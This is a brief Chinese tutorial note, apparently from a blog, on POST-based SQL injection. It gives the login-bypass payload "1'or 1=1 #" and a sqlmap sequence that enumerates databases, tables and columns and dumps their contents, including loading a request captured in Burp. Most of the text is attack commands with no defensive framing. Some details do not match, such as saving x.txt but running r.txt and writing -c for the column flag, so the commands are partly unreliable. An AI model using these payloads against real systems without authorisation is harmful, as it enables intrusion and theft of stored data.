sql注入之post 传参方式的注入_sqlmap post注入

在输入框里面进行注入

需要的注释符 #

是否存在注入点，注入点在有和数据库服务器交互的地方

万能密码

1'or 1=1 #

sqlmap 之post 注入1:

将变量参数位置加*

uname =name*
在sqlmap安装 目录下面新建文本文件为x.txt

python sqlmap.py   -r  r.txt

                 --dbs 

-D dn   --tables 

-D dn -T  tn --columns

-D dn -T tn -c1,c2  --dump

post 注入2:

先将post请求在burp捕获，将抓到的请求内容保存到文件中，
sqlmap  -r ./sqlmapfile（-r  捕获的请求文件及其所在位置） -p  id(加入指定参数)  --cookie="" 
加入-p 指定参数  -p id